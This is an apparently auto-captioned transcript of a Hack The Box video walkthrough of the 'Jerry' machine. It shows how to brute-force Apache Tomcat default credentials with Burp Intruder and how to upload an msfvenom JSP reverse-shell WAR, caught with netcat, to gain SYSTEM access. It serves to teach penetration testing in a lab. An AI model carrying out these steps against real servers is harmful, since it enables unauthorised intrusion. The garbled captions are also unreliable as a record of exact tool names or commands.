1
00:00:00,480 --> 00:00:03,660
So today's machine is going to be Jerry.

2
00:00:03,720 --> 00:00:06,900
Jerry leaves at ten not ten ten that ninety five.

3
00:00:07,260 --> 00:00:11,410
So if you're not already on this site go ahead and go to hack the box stop.

4
00:00:11,450 --> 00:00:20,190
You go over here to your all machines and scroll down to Jerry and hit the play button.

5
00:00:20,190 --> 00:00:25,950
Once you've got that all set up let's go ahead and get Jerry scanning so I'm and open up a new terminal

6
00:00:25,950 --> 00:00:30,450
here and we'll do our typical scan install where I scan it.

7
00:00:30,480 --> 00:00:35,700
We'll talk about it until the scan comes back and then we'll look at the scan so you can go ahead and

8
00:00:35,700 --> 00:00:37,340
use your favorite scan method.

9
00:00:37,350 --> 00:00:39,550
You should know mine by now.

10
00:00:39,630 --> 00:00:41,190
Very straightforward here

11
00:00:44,050 --> 00:00:48,290
and we'll let that run so let's talk about Jerry.

12
00:00:48,300 --> 00:00:50,640
Jerry is a Windows machine as we can see here.

13
00:00:50,670 --> 00:00:57,650
And historically Jerry is one of the most rooted and easier machines on Hack the box.

14
00:00:57,870 --> 00:01:06,240
We can see here that it's got 12000 user owns and roots and we can see from the rest that I mean the

15
00:01:06,240 --> 00:01:08,680
next closest analyst list is eight thousand right.

16
00:01:09,540 --> 00:01:15,900
So by far Jerry is one of the most rooted if not the most rooted machines.

17
00:01:15,900 --> 00:01:22,050
So while it's easy it does not mean that it does not have important lessons to teach us.

18
00:01:22,050 --> 00:01:26,490
The most important lesson we're gonna learn today is about default credentials.

19
00:01:26,750 --> 00:01:31,660
Why are default credentials so bad and why are they so common still.

20
00:01:31,860 --> 00:01:36,960
I run into default credentials as a pen tester all the time on the external web.

21
00:01:36,960 --> 00:01:44,100
In my history I have run into Cisco Cisco on a default credential on a Cisco router leading to internal

22
00:01:44,100 --> 00:01:45,320
network access.

23
00:01:45,480 --> 00:01:50,540
I have got domain admin off of a printer with default credentials on an internal network.

24
00:01:50,550 --> 00:01:55,590
I've gotten a reverse shells of the default credentials on internal networks so default credentials

25
00:01:55,590 --> 00:02:00,720
can lead to some very very bad things and you're going to see an example of that today.

26
00:02:00,720 --> 00:02:05,930
On top of that what we're going to be doing is we're going to be doing some bash scripting.

27
00:02:05,940 --> 00:02:10,710
We'll do a little bit of brute forcing we're going to be using brb sweet today.

28
00:02:10,830 --> 00:02:17,040
There's a lot of cool tactics that I can show you that are are going to just improve our learning process.

29
00:02:17,040 --> 00:02:24,260
On top of that I'll talk about some manual exploitation for this machine Lee's MSF venom generates some

30
00:02:24,270 --> 00:02:24,780
shell.

31
00:02:24,810 --> 00:02:28,740
But we'll use net cash to actually get in the machine and then we'll talk about file transfers and how

32
00:02:28,740 --> 00:02:29,970
to improve.

33
00:02:29,970 --> 00:02:34,320
So we've got a lot to learn from a very very basic box.

34
00:02:34,320 --> 00:02:42,540
So let's go ahead and just take a look at the scan now so our scan came back and sixty five thousand

35
00:02:42,540 --> 00:02:44,880
five hundred thirty four ports were filtered.

36
00:02:44,880 --> 00:02:46,290
That is great.

37
00:02:46,320 --> 00:02:47,130
Why is that great.

38
00:02:47,130 --> 00:02:51,930
That means we only have one port to focus on here in that port is 80 80.

39
00:02:51,930 --> 00:02:57,090
Now there are some situations where there might be hit imports like Port knocking but for a machine

40
00:02:57,120 --> 00:02:58,760
this easy on Hack the box.

41
00:02:58,980 --> 00:03:01,260
I'm not thinking that that's the path.

42
00:03:01,410 --> 00:03:06,750
So when we're looking at 80 80 this says hey vulnerability for sure somewhere in 1880.

43
00:03:06,870 --> 00:03:08,730
That's where you're going to get it.

44
00:03:08,760 --> 00:03:14,430
So we've got some version information here we could see Apache Tomcat with the GSP engine of one point

45
00:03:14,430 --> 00:03:21,210
one and we can also see Apache Tomcat version number here of seven point zero point eight eight.

46
00:03:21,210 --> 00:03:26,320
So as we talked about before this is perhaps a default web page.

47
00:03:26,460 --> 00:03:28,910
We're getting a lot of Tomcat information here.

48
00:03:28,910 --> 00:03:35,400
And if it's not a default web page why are they disclosing their server headers with service information.

49
00:03:35,460 --> 00:03:36,570
Know that's just a no no.

50
00:03:36,570 --> 00:03:40,350
We would write this up on a pen test report as a finding.

51
00:03:40,350 --> 00:03:43,860
So there are some things that we can do off on off the bat here.

52
00:03:43,860 --> 00:03:47,870
You know my first decision as always to go to the Web page and see what I'm working with.

53
00:03:48,030 --> 00:03:54,360
But if we do want to we can also google something like Apache Tomcat seven point zero point eighty eight

54
00:03:54,420 --> 00:03:59,940
exploit and see if there's any exploits out there we could do the same for this GSP engine and see if

55
00:03:59,940 --> 00:04:01,440
there's any exploits for that.

56
00:04:01,530 --> 00:04:03,170
That would be version exploits.

57
00:04:03,180 --> 00:04:09,690
Right before we do that or we're not actually going to get into that but before we did that my step

58
00:04:09,690 --> 00:04:13,470
would always be to go out to the web page just to see what's going on.

59
00:04:13,680 --> 00:04:18,540
And in this instance we're working with poor 80 80 so we're going to go out and we're just going to

60
00:04:18,540 --> 00:04:20,810
go to 10 that 10 that 10 ninety five.

61
00:04:20,820 --> 00:04:24,990
You can see I have it here with the port 80 80 at the end.

62
00:04:24,990 --> 00:04:30,460
Go ahead and hit enter and we're brought to this Apache Tomcat page.

63
00:04:30,630 --> 00:04:37,530
Now this is this is not a good page should be leaving open open or even if it's on the the internal

64
00:04:37,530 --> 00:04:37,890
network.

65
00:04:37,890 --> 00:04:43,580
But if this is on the externals is bad you'll find this on external networks.

66
00:04:43,740 --> 00:04:50,790
People will tuck it away under like Slash manager or slash admin or whatever because of this over here

67
00:04:50,790 --> 00:04:53,820
on the side is what gets you into the admin panels.

68
00:04:55,500 --> 00:04:56,510
So you do see this a lot.

69
00:04:56,540 --> 00:04:58,780
This Apache Tomcat is very realistic.

70
00:04:58,920 --> 00:05:06,870
And if there is any sort of guest book credentials on on this side of the house Oh it's it's game over

71
00:05:06,870 --> 00:05:08,130
and you're going to find out why.

72
00:05:08,430 --> 00:05:12,270
So this would be a finding two depending on what you're doing and this is external.

73
00:05:12,270 --> 00:05:14,270
This is like hey why do you have this up.

74
00:05:14,370 --> 00:05:19,200
You know you should put this behind a VPN so that only you can access it when you're on the internal

75
00:05:19,200 --> 00:05:19,520
side.

76
00:05:19,530 --> 00:05:26,870
Don't leave this open on the external network on the internal side you know is this is this V land off.

77
00:05:26,880 --> 00:05:28,340
Who has access to this page.

78
00:05:28,340 --> 00:05:30,450
Why do they have access to this page.

79
00:05:30,450 --> 00:05:33,840
You don't want this easily accessible by any means.

80
00:05:33,840 --> 00:05:39,250
So we're at this page and we have this manager app over here on the side.

81
00:05:39,270 --> 00:05:43,560
Now we can log in with the manager app and do some malicious things.

82
00:05:43,560 --> 00:05:49,770
But before we can log in here one of the first things I do when I see a log in on a log in page like

83
00:05:49,770 --> 00:05:55,720
this with the service version I'm going right to Google and say Hey Google what's up.

84
00:05:55,740 --> 00:06:04,140
Let's talk about Apache Tomcat default credentials and let's see what we can pull up.

85
00:06:04,140 --> 00:06:07,190
First thing that comes up is get hub right.

86
00:06:07,320 --> 00:06:13,440
And we can come into GitHub and get hub has this wonderful list because Tomcat has quite a few default

87
00:06:13,440 --> 00:06:14,910
credentials.

88
00:06:14,940 --> 00:06:19,350
So what we can do is we can take this list and use it in a brute force.

89
00:06:19,350 --> 00:06:22,010
Now there are tools out there that'll do this for us.

90
00:06:22,050 --> 00:06:25,710
I kind of want to get a little crafty today and teach us some manual methods.

91
00:06:25,710 --> 00:06:27,480
I think that will be more fun.

92
00:06:27,480 --> 00:06:34,060
So what we're going to do is we're going to fire up brb sweet in the newer bird so the air's out with

93
00:06:34,060 --> 00:06:35,230
this Java air.

94
00:06:35,230 --> 00:06:37,830
Don't worry about it too much.

95
00:06:37,990 --> 00:06:39,570
We're not gonna worry about fixing it today.

96
00:06:39,580 --> 00:06:41,730
I'll just work around it.

97
00:06:41,800 --> 00:06:47,640
So we're going to go ahead and just click next insert burp with default now in order to get brb sweet

98
00:06:47,640 --> 00:06:55,680
working there is this proxy here right in the proxy if we go actually into options tab it sits at 1

99
00:06:55,680 --> 00:07:04,410
2 7 0 0 1 the home address on port 80 80 and this is how we intercept traffic so we need to actually

100
00:07:04,410 --> 00:07:11,760
do that we need to go into our little hamburger menu here and go up to preferences or down to preferences

101
00:07:12,300 --> 00:07:18,030
scroll all the way down and at the very bottom is the network proxy we're going to filter all of our

102
00:07:18,030 --> 00:07:24,570
traffic through brb sweet right now you should be set to use system proxy settings go ahead and select

103
00:07:24,630 --> 00:07:27,320
manual proxy configuration.

104
00:07:27,570 --> 00:07:30,410
1 2 7 0 0 1.

105
00:07:30,450 --> 00:07:39,780
Here or 80 80 here and click the box for use this proxy server for all protocols.

106
00:07:39,810 --> 00:07:44,450
So it should look like this when it's all said and done OK.

107
00:07:44,640 --> 00:07:50,160
So we'll hit okay on that and we'll test this out if we go back to the Apache Tomcat and we just hit

108
00:07:50,190 --> 00:07:51,660
enter.

109
00:07:51,880 --> 00:07:54,240
It shouldn't load it should freeze here.

110
00:07:54,240 --> 00:08:00,100
Some things should just be spinning and if you look at your proxy proxy got intercepted what's going

111
00:08:00,100 --> 00:08:01,210
on.

112
00:08:01,210 --> 00:08:07,300
Well what's happening here is we intercepted the request and before we send it to the page we have the

113
00:08:07,300 --> 00:08:09,010
opportunity to modify it.

114
00:08:09,100 --> 00:08:14,560
We can say instead of a get request you to put this as a poetry class we can get malicious in here we

115
00:08:14,560 --> 00:08:15,980
could do all sorts of things.

116
00:08:16,120 --> 00:08:21,880
And this is where where that testing really becomes fun is when we start tampering and doing certain

117
00:08:21,910 --> 00:08:25,220
you know malicious activities with with these requests.

118
00:08:25,240 --> 00:08:27,360
But for now let's just go ahead and forward it.

119
00:08:29,060 --> 00:08:30,920
And you should see the page reloads.

120
00:08:31,010 --> 00:08:36,410
Perfect what we're after today is this manager app.

121
00:08:36,410 --> 00:08:42,860
So if we click on manager app and you see that OK it freezes on manager.

122
00:08:42,860 --> 00:08:45,270
Let's just for this request and see what happens.

123
00:08:46,930 --> 00:08:47,250
All right.

124
00:08:47,320 --> 00:08:51,470
So ten ten ten ninety five eighty eighty.

125
00:08:51,610 --> 00:08:56,890
It's asking us for credentials Well there's twenty one or so on that list but one I did remember was

126
00:08:56,890 --> 00:08:58,170
Tomcat tomcat.

127
00:08:58,200 --> 00:09:06,840
So let's try Tomcat Tomcat and just say OK now immediately this intercepts the request and a lot of

128
00:09:06,840 --> 00:09:10,970
times what you'll see is you'll see a username field and a password field here.

129
00:09:11,370 --> 00:09:18,900
But we're actually getting this authorization basic and it looks like it's encoded with base64.

130
00:09:19,230 --> 00:09:23,780
You could usually tell this by the equal signs at the end typically.

131
00:09:23,990 --> 00:09:31,590
So we can do here is we can right click on this and we can say send this to decoder is one option we're

132
00:09:31,590 --> 00:09:34,380
going to do and you'll see your decoder tap lights up.

133
00:09:34,380 --> 00:09:34,730
Right.

134
00:09:35,540 --> 00:09:39,540
And you come in here and you just scroll down and highlight this whole area and let's see what it's

135
00:09:39,540 --> 00:09:47,630
doing we'll decode as over here and we'll say base64 if we scroll down you can see it's just saying

136
00:09:47,630 --> 00:09:50,040
hey Tomcat colon tomcat.

137
00:09:50,050 --> 00:09:57,390
So username colon password is what it's attempting and let's go ahead and forward this and see what

138
00:09:57,390 --> 00:10:00,800
happens doesn't look like it worked.

139
00:10:00,800 --> 00:10:01,160
Right.

140
00:10:01,190 --> 00:10:03,880
So we forwarded it and it didn't work.

141
00:10:04,130 --> 00:10:05,200
OK.

142
00:10:05,240 --> 00:10:11,100
We could try manager Tomcat or something along those lines.

143
00:10:11,360 --> 00:10:15,460
And this time what we can do intercept it one more time.

144
00:10:15,650 --> 00:10:17,710
We could do a couple different cool little things.

145
00:10:17,720 --> 00:10:25,390
One is we could say hey send this to repeater and Hey Number Two send this to intruder so we'll see

146
00:10:25,390 --> 00:10:31,700
both of our tabs light up if we look at a repeater repeater just repeats requests we have the opportunity

147
00:10:31,700 --> 00:10:37,220
instead of sending it in real time with a proxy to come back over here and send the request and see

148
00:10:37,220 --> 00:10:38,720
what the response is.

149
00:10:38,720 --> 00:10:43,480
So this is where we can kind of just play with certain requests and see how the server responds.

150
00:10:43,490 --> 00:10:49,070
So if we hit go on this we could see that we got a 4 or 1 unauthorized so far one means hey you did

151
00:10:49,070 --> 00:10:50,780
not get access to here.

152
00:10:51,140 --> 00:10:55,950
So this set of credentials is incorrect.

153
00:10:56,360 --> 00:11:03,710
And OK let's just go ahead and turn the intercept off or let this go and cancel and then let's go ahead

154
00:11:03,740 --> 00:11:09,680
and try brute forcing this because you know there's 20 something here right 30 lines it says 30 lines

155
00:11:09,680 --> 00:11:10,460
of passwords.

156
00:11:10,460 --> 00:11:12,180
That's a lot of passwords.

157
00:11:12,200 --> 00:11:21,360
So what we'll do is let's go into our new window OK and let me make this better and I'm going to use

158
00:11:21,370 --> 00:11:22,740
git it because I like get it.

159
00:11:22,740 --> 00:11:24,680
So let's just say get it tomcat.

160
00:11:24,780 --> 00:11:31,840
Text what we'll do here is we will copy all these usernames and passwords

161
00:11:34,760 --> 00:11:36,370
and then paste them into here

162
00:11:39,110 --> 00:11:42,770
now select the space in between.

163
00:11:42,770 --> 00:11:44,260
Remember the format that we had.

164
00:11:44,270 --> 00:11:46,450
We've got to put this into base64.

165
00:11:47,120 --> 00:11:52,490
So what we're gonna do I guess is you're explaining that a little bit better is we sent our request

166
00:11:52,490 --> 00:11:58,690
to intruder and if we come into positions here we see that our request is sitting here what intruder

167
00:11:58,690 --> 00:12:03,350
is going to do is do a brute force style attack based on the attack type that we select.

168
00:12:03,350 --> 00:12:06,240
Well the requests are coming through in base64.

169
00:12:06,260 --> 00:12:13,330
So we have to put these into base64 in that format that we saw see user name calling passwords.

170
00:12:13,340 --> 00:12:15,860
We're going to do the same thing now is get this setup.

171
00:12:16,070 --> 00:12:20,090
Then we're going to convert these to base 64 and then we're going to fire them off.

172
00:12:20,090 --> 00:12:26,190
So first things first let's go back into here we've got this little space copy let's hit control H.

173
00:12:26,210 --> 00:12:28,010
That's our fine and replace.

174
00:12:28,010 --> 00:12:30,460
Let's go ahead and just paste that space here.

175
00:12:30,680 --> 00:12:36,380
And what we're gonna do is we're going to just replace everything that has that kind of space with this

176
00:12:36,390 --> 00:12:38,510
colon or replace all.

177
00:12:38,540 --> 00:12:40,700
And look how easy that was.

178
00:12:40,700 --> 00:12:46,330
So now we've got a set list of credentials here that is actually twenty five lines long.

179
00:12:46,520 --> 00:12:52,730
And so we're gonna say this out and we're gonna write a little batch script.

180
00:12:52,730 --> 00:13:00,970
So if you have never used any bash scripting one I recommend watching some videos on bash scripting.

181
00:13:00,980 --> 00:13:07,940
I've got a feel my channel if you watch the tail end of the Linux for ethical hackers course it's in

182
00:13:07,940 --> 00:13:08,860
there.

183
00:13:08,990 --> 00:13:11,290
I've got individual videos on it as well.

184
00:13:11,300 --> 00:13:16,520
Pretty much typically the same lesson but the the importance of what you're about to see is called a

185
00:13:16,520 --> 00:13:22,520
for loop and for loops are awesome you see one line for loops a lot and they're just very useful when

186
00:13:22,520 --> 00:13:24,200
it comes to pen testing.

187
00:13:24,200 --> 00:13:27,180
So let's break down what we're going to do.

188
00:13:27,260 --> 00:13:29,930
So we've got credentials in this list right.

189
00:13:29,930 --> 00:13:33,320
We've got these credentials and we'll just take one for an example.

190
00:13:33,500 --> 00:13:34,820
We want to convert this.

191
00:13:34,940 --> 00:13:44,450
These credentials into base64 so one way we can do that is we can as Echo and we say echo dash in and

192
00:13:44,480 --> 00:13:54,500
we're gonna say I want to put that say Tomcat Tomcat right like that into base 64.

193
00:13:55,190 --> 00:13:58,980
This is the command to do that and there it is.

194
00:13:58,980 --> 00:14:06,120
Now if we were to decode this this would come back out as Tomcat Tomcat OK that's cool but we've got

195
00:14:06,120 --> 00:14:14,130
a long list here in this Tomcat dot text and what we need to do is do this for everything in that list.

196
00:14:14,130 --> 00:14:17,490
So let's write a for loop and we'll talk through it.

197
00:14:18,270 --> 00:14:23,580
So I'm going to say for Fred and you'd call this whatever you want you call it Bob if you want but for

198
00:14:23,580 --> 00:14:30,630
credit it's our variable in and we've got to specify what we're what the credentials are and where they're

199
00:14:30,630 --> 00:14:31,350
at.

200
00:14:31,350 --> 00:14:35,150
So every line here is going to be a credential in this loop.

201
00:14:35,430 --> 00:14:40,560
And I'll explain it a little bit better detail but we're gonna cat out this Tomcat dog tags meaning

202
00:14:40,560 --> 00:14:43,330
word to print all the lines.

203
00:14:44,100 --> 00:14:49,530
And what's going to happen is we're going to do something we're going to do an echo dash.

204
00:14:49,530 --> 00:14:59,180
And for that credential and we're going Python into base64 and then we're gonna say done.

205
00:14:59,310 --> 00:15:00,870
So what's happening here.

206
00:15:00,870 --> 00:15:06,230
A for loop means you're going to do something for everything in that instance.

207
00:15:06,240 --> 00:15:06,480
Right.

208
00:15:06,510 --> 00:15:12,090
So for the first line in Tomcat dog tags for the second line for the third line until you are completely

209
00:15:12,090 --> 00:15:15,470
done so for credential.

210
00:15:15,470 --> 00:15:19,190
All we're saying is hey the first line we're going to call that crowd.

211
00:15:19,220 --> 00:15:24,110
And then when that first line prints out and this cat we're gonna put it over here in this echo command

212
00:15:24,200 --> 00:15:28,630
put it through base64 and then we're we're going to go back again in the second line we're going to

213
00:15:28,630 --> 00:15:29,810
call that cred.

214
00:15:29,840 --> 00:15:35,420
We're going to do it again and then we're gonna go all the way through and base64 all of these and then

215
00:15:35,420 --> 00:15:37,850
it should print out and be done.

216
00:15:38,000 --> 00:15:39,880
Boom look at that.

217
00:15:39,890 --> 00:15:40,180
OK.

218
00:15:40,190 --> 00:15:46,430
So you've got all the credentials that we just put through in base64 format so we're gonna do is just

219
00:15:46,430 --> 00:15:48,200
this copy all these here

220
00:15:51,040 --> 00:15:55,510
and we're going to go back into brb sweet now of course.

221
00:15:55,510 --> 00:15:59,560
Like I said there is a tool that's out there for this or you can manually type these but with so many

222
00:15:59,560 --> 00:16:04,570
default granules most Web sites all or most programs only have like two sets of default credentials.

223
00:16:04,570 --> 00:16:07,840
But Tomcat for whatever reason has a lot.

224
00:16:08,350 --> 00:16:14,020
But here we go we're in brb suite now in order to use intruder.

225
00:16:14,020 --> 00:16:17,160
We need to set up what we're going to intrude on.

226
00:16:17,230 --> 00:16:21,670
So here we need to set our payload parameter area.

227
00:16:21,670 --> 00:16:23,980
We're going to set the position of one here.

228
00:16:23,980 --> 00:16:25,150
This is position 1.

229
00:16:25,180 --> 00:16:25,900
OK.

230
00:16:26,050 --> 00:16:30,000
And we're saying hey everything here this is what we're going to replace.

231
00:16:30,130 --> 00:16:33,310
So we're going to use a sniper attack and sniper just means one.

232
00:16:33,310 --> 00:16:34,150
That's how you can think of it.

233
00:16:34,150 --> 00:16:36,740
This is just one payload that we're gonna be sending off.

234
00:16:36,760 --> 00:16:43,530
So if we go into payloads tab over here we can just hit paste on our list and you can see now it's going

235
00:16:43,530 --> 00:16:49,510
to fire off twenty five payloads what it's gonna do is it's going to replace the base 64 that we highlighted

236
00:16:49,540 --> 00:16:51,850
with the base 64 that's here.

237
00:16:51,850 --> 00:16:56,380
One other thing that we need to take off here is this you are all encoding it's going to attempt to

238
00:16:56,380 --> 00:17:02,000
you are all in code these characters and in this instance if it tries to you are out in code these equal

239
00:17:02,000 --> 00:17:04,900
signs is actually going to fail for us.

240
00:17:04,900 --> 00:17:09,570
So it should be noted that we're also on a free community edition of brb suite.

241
00:17:09,970 --> 00:17:12,150
Thus it's going to be slower.

242
00:17:12,220 --> 00:17:14,260
The free edition is very slow.

243
00:17:14,260 --> 00:17:17,360
The pro edition very fast.

244
00:17:17,680 --> 00:17:22,090
So we're gonna head start attack and it's gonna say Hey we're gonna slow this down just to be jerks

245
00:17:22,680 --> 00:17:25,900
and what's gonna happen here is we're going through all twenty five requests.

246
00:17:25,900 --> 00:17:26,740
Right.

247
00:17:26,740 --> 00:17:28,810
And you can see different status codes come through.

248
00:17:28,870 --> 00:17:31,180
I mean that's what we're looking at we're looking at two things.

249
00:17:31,300 --> 00:17:36,430
One we could sort by status code two we could sort by the length here.

250
00:17:36,460 --> 00:17:42,070
Now some advanced topics or tactics is when you're running through thousands say you're doing a user

251
00:17:42,070 --> 00:17:42,520
name.

252
00:17:42,520 --> 00:17:49,120
Brute force and you're trying to find the one person that you know might have gone through you can come

253
00:17:49,120 --> 00:17:56,380
through say on our response and you could see something in here that says like you're not authorized

254
00:17:56,380 --> 00:18:02,500
to be this page you can copy you're not authorized and you can paste it down into your payload rules

255
00:18:02,500 --> 00:18:07,840
here or options and say hey grep on this and then you'll have a little checkbox up here that says you

256
00:18:07,840 --> 00:18:11,650
are not authorized and it will check every time it comes through here.

257
00:18:11,650 --> 00:18:13,210
And then you could just sort by that.

258
00:18:13,240 --> 00:18:16,310
So if you click on these you can sort by different things right.

259
00:18:16,330 --> 00:18:22,240
So length is a big one if length changes look how significant in this length is here and you see the

260
00:18:22,240 --> 00:18:23,200
rest of these.

261
00:18:23,200 --> 00:18:23,700
Nothing.

262
00:18:23,710 --> 00:18:28,840
Any four hundred we don't really care about this one for all three for whatever reason forbidden access

263
00:18:28,840 --> 00:18:35,960
denied this one that might be a valid set of credentials but we don't have access to that application.

264
00:18:36,010 --> 00:18:40,120
This one is a valid set of credentials that does look at the two hundred status that means.

265
00:18:40,140 --> 00:18:41,220
OK.

266
00:18:41,260 --> 00:18:47,370
And on top of it we have a 17000 length compared to two thousand or three thousand here.

267
00:18:48,130 --> 00:18:53,590
So significant differences but in long lists it's better to grep on something like an error and then

268
00:18:53,590 --> 00:18:58,870
just sort by that air with the checkboxes to find you know maybe a different message that came through

269
00:18:58,870 --> 00:19:04,960
as opposed to just looking for a length or status codes because you might get like a 3 0 to redirect

270
00:19:04,960 --> 00:19:08,220
or something on a log n or successful log in.

271
00:19:08,230 --> 00:19:08,540
OK.

272
00:19:08,550 --> 00:19:17,140
So here we've got these credentials which these actually come out to Tomcat secret is how that played

273
00:19:17,140 --> 00:19:17,880
out.

274
00:19:17,890 --> 00:19:21,520
So this is Tomcat secret in case you are curious

275
00:19:25,090 --> 00:19:25,770
OK.

276
00:19:25,780 --> 00:19:31,990
And so that log this in so let's go ahead and say no to these changes.

277
00:19:32,110 --> 00:19:33,820
We know for sure that we're in.

278
00:19:33,850 --> 00:19:38,500
Let's go to the page and what I'm going to do for the rest of this time I'm going to go ahead and turn

279
00:19:38,500 --> 00:19:46,900
off Barb sweet and these proxy settings and let's just log into the manager app with our newfound credentials

280
00:19:51,870 --> 00:19:53,670
and you could a base decoded this.

281
00:19:53,670 --> 00:19:55,520
I was just being lazy by the way.

282
00:19:55,670 --> 00:20:00,190
You could come in here and say hey what is this because I have no idea I can't read this.

283
00:20:00,300 --> 00:20:09,620
You can easily just go to decoder and decode that right and see that it's Tomcat secret OK.

284
00:20:10,110 --> 00:20:19,300
So from here we are now in the application itself so if you've never been in a tomcat application they

285
00:20:19,300 --> 00:20:28,100
use something called War files okay war files are used to upload here and they deploy these applications.

286
00:20:28,120 --> 00:20:31,300
You see Manager host manager examples blah blah blah.

287
00:20:31,960 --> 00:20:36,600
Well we can do is upload a malicious war file and get a reverse shell.

288
00:20:36,610 --> 00:20:40,150
See there is a area here to upload a war file.

289
00:20:40,150 --> 00:20:46,280
Now this is your first time in the application in your new and you're like oh man what am I doing here.

290
00:20:46,300 --> 00:20:49,080
You say OK well I see that there's a war file.

291
00:20:49,090 --> 00:20:51,500
I wonder if I can be malicious at that.

292
00:20:51,550 --> 00:20:59,590
And then you might go and say or file reverse shell or something along those lines war or file exploit

293
00:21:00,130 --> 00:21:04,240
and then you could see there's all kinds of articles that come through using medicinally to create a

294
00:21:04,240 --> 00:21:08,330
war backdoor Apache Tomcat war backdoor.

295
00:21:08,350 --> 00:21:13,990
So this is the kind of information that we're after a couple of the things that we see down here that

296
00:21:13,990 --> 00:21:19,340
help us out as well is we see that we're running on a Windows Server 2012 our two.

297
00:21:19,510 --> 00:21:22,360
That means that we're likely running on 64 bit.

298
00:21:22,360 --> 00:21:22,630
Right.

299
00:21:22,630 --> 00:21:26,830
This is our two server and we get some information about the OS.

300
00:21:26,860 --> 00:21:27,470
That's nice.

301
00:21:27,490 --> 00:21:29,990
Oh AMG 64 it is 64 bit.

302
00:21:30,070 --> 00:21:34,750
So we picked up a little bit information hostname and IP address so a little bit information disclosure

303
00:21:34,750 --> 00:21:39,160
there as well that'll help us when we're trying to make this this war file.

304
00:21:39,160 --> 00:21:39,550
Right.

305
00:21:40,210 --> 00:21:43,240
So what we're gonna use is a MSF venom.

306
00:21:43,240 --> 00:21:47,350
There's Tomcat war river shell massive animals click on that here.

307
00:21:47,410 --> 00:21:48,280
This is good.

308
00:21:48,280 --> 00:21:50,690
So this creating Metis flight payloads here.

309
00:21:50,800 --> 00:21:52,690
This net set out W.S. is good.

310
00:21:52,690 --> 00:21:54,940
There's a lot of cheat sheets out there for different ones.

311
00:21:54,940 --> 00:22:00,700
This is a very nice cheat sheet that I like to go to as you can see I've already been to it before.

312
00:22:00,700 --> 00:22:05,680
You could just go down the list like if this is a BHP site we can go to a site and I think I've showed

313
00:22:05,680 --> 00:22:07,500
you this before for the ISP.

314
00:22:07,540 --> 00:22:09,970
Same thing here we're just using a war file.

315
00:22:09,970 --> 00:22:12,180
We're gonna generate this on our own.

316
00:22:12,280 --> 00:22:18,190
So let's go ahead and let's control El and if we see what it wants us to do.

317
00:22:18,230 --> 00:22:22,800
Luscious all this copy and paste it will be lazy OK.

318
00:22:22,840 --> 00:22:26,450
And we'll paste it in now we have two options here.

319
00:22:26,460 --> 00:22:27,320
Right.

320
00:22:27,390 --> 00:22:32,310
We can do the manual method which is what we're doing or we could do the Metis point method.

321
00:22:32,310 --> 00:22:38,100
We'll do the manual method today but we could change the payload to a mature printer payload and use

322
00:22:38,100 --> 00:22:39,030
the exploit handler.

323
00:22:39,030 --> 00:22:43,220
I met this boy and get an exploit or Metis flavor shell easily.

324
00:22:43,290 --> 00:22:43,700
OK.

325
00:22:44,160 --> 00:22:50,430
So let's go back and let's just talk about overseeing MSF venom dash P for payload.

326
00:22:50,430 --> 00:22:56,630
We are running on Java on this platform and we're gonna be using a GSP shall reverse TPP.

327
00:22:56,640 --> 00:22:59,100
Notice all the underscores not the forwards.

328
00:22:59,100 --> 00:23:01,860
This is getting sent all at once.

329
00:23:01,860 --> 00:23:05,190
This is an onstage payload not a stage payload.

330
00:23:06,060 --> 00:23:10,730
So let's go ahead and enter in the IP address that we're going to be using.

331
00:23:10,740 --> 00:23:18,930
I actually don't know mine so I'll open up a new tab really quick and do the ISF config or your IPA

332
00:23:19,870 --> 00:23:23,670
10 not 10 to 14 not twenty four for me.

333
00:23:23,670 --> 00:23:30,360
So we're gonna be listening on our IP address and you can listen in on the port of your choice.

334
00:23:30,360 --> 00:23:36,180
I will this use the standard all four is on this machine and then we're going to generate this

335
00:23:41,310 --> 00:23:44,760
and it takes just a second here OK.

336
00:23:44,770 --> 00:23:48,250
We have generated a shell dot war file.

337
00:23:48,250 --> 00:23:54,400
That means we need to be listening on this 4 4 4 4 in order for this shell to come back to us.

338
00:23:54,400 --> 00:24:01,990
Let's go ahead and use net cap dash and the LP so net cat is a listener slash connector.

339
00:24:02,290 --> 00:24:03,710
It's a port tool.

340
00:24:03,710 --> 00:24:05,680
It's it's amazing functionality.

341
00:24:05,680 --> 00:24:10,270
What we're really doing here is we're saying hey net cat I want to listen right now and again remember

342
00:24:10,570 --> 00:24:13,770
when we're doing reverse shell that just means somebody talks back to us.

343
00:24:13,900 --> 00:24:15,610
All we have to do is listen.

344
00:24:15,700 --> 00:24:18,190
So we're gonna be listening on all fours.

345
00:24:18,460 --> 00:24:20,940
That's the part we're listening on now.

346
00:24:20,950 --> 00:24:26,560
What's gonna happen is this is going to say we're going to upload it and then it's going to try to connect

347
00:24:26,560 --> 00:24:29,310
back to the IP address that we supply.

348
00:24:29,350 --> 00:24:31,900
Let's go ahead and browse for that war file.

349
00:24:31,900 --> 00:24:42,040
I put mine in my root folder and there it is Shell that war.

350
00:24:42,130 --> 00:24:45,850
And we're gonna say deploy we've deployed it.

351
00:24:45,970 --> 00:24:51,920
You can see here that it is slash shell and we've got nothing yet.

352
00:24:52,210 --> 00:24:58,650
But we can force this along and get that shell by going to it and boom look at that.

353
00:24:58,650 --> 00:25:00,640
It talked back to us.

354
00:25:00,640 --> 00:25:02,280
We are so malicious.

355
00:25:02,440 --> 00:25:02,890
OK.

356
00:25:03,280 --> 00:25:06,970
So the best thing about this box also is who am I.

357
00:25:06,980 --> 00:25:07,850
Authority system.

358
00:25:07,860 --> 00:25:08,970
Right off the bat.

359
00:25:09,130 --> 00:25:14,790
And if we go to the users file remember this from a long time ago.

360
00:25:14,920 --> 00:25:16,080
If we say Dir.

361
00:25:16,150 --> 00:25:18,540
Actually desktop sorry and we say Dir.

362
00:25:18,890 --> 00:25:19,840
And we type.

363
00:25:19,840 --> 00:25:22,910
You see it's flags or it might be is that.

364
00:25:22,930 --> 00:25:23,680
That's a directory.

365
00:25:23,680 --> 00:25:28,200
Let's go to the flags directory and then do Dir.

366
00:25:28,450 --> 00:25:32,380
And then two for the price of one they actually give you both flags here.

367
00:25:32,410 --> 00:25:38,830
So the fact that there are people that only had there were there were more root bones and there were

368
00:25:38,830 --> 00:25:43,840
user owns for whatever reason some people decided they didn't want the user on this machine.

369
00:25:44,050 --> 00:25:45,580
But both flags are sitting in there.

370
00:25:45,610 --> 00:25:47,280
So I think that's funny.

371
00:25:47,470 --> 00:25:50,280
Anyway we're back in here OK.

372
00:25:50,280 --> 00:25:56,840
We have system on this machine we can do all kinds of commands and look around right.

373
00:25:56,980 --> 00:26:03,450
